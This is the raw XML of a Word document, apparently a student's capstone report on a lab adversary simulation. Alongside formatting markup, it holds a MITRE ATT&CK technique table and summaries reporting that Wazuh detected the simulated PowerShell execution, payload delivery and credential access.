        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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5731510" cy="2820670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2820670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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8. MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0"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rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1580</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cloud Infrastructure Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OS Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>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9. PTES Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A controlled adversary simulation was conducted against a lab environment to evaluate the ability to detect and respond to modern attack techniques. The assessment simulated cloud enumeration, payload delivery, PowerShell execution, credential access attempts, and defense evasion activities. The engagement successfully demonstrated how attackers may leverage valid credentials and PowerShell-based execution to gain access and perform post-exploitation activities. Wazuh monitoring generated multiple alerts throughout the attack lifecycle, including PowerShell execution, suspicious process creation, and credential access attempts. The assessment highlighted the importance of PowerShell logging, least-privilege IAM policies, endpoint monitoring, and enhanced cloud visibility. Recommendations include implementing stricter IAM controls, improving endpoint protection policies, enabling advanced PowerShell logging, and strengthening detection coverage for post-exploitation techniques.</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10. Non-Technical Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A simulated cyberattack was conducted against a controlled lab environment to test security monitoring and detection capabilities. The exercise included cloud reconnaissance, remote payload execution, defense evasion, and credential access simulation. Security monitoring tools successfully detected suspicious activity across multiple stages of the simulated attack. The assessment demonstrated the importance of strong access controls, continuous monitoring, and proactive threat detection in reducing organizational cyber risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>11. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The capstone project successfully demonstrated an end-to-end adversary simulation within a controlled environment. The engagement provided practical experience in offensive security operations, cloud reconnaissance, payload delivery, PowerShell-based execution, and blue team detection analysis. Wazuh successfully captured multiple indicators of malicious activity, demonstrating the effectiveness of centralized monitoring and telemetry collection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>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2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16">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1444625</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-342900</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="8618220" cy="1023620"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom/>
          <wp:docPr id="2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16">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1444625</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-342900</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="8618220" cy="1023620"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom/>
          <wp:docPr id="2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9"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber2">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet3">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>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1.png"/>
</Relationships>
</file>

<file path=word/_rels/header3.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LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>15</Pages>
  <Words>663</Words>
  <Characters>4740</Characters>
  <CharactersWithSpaces>5371</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2026-05-12T15:52:52Z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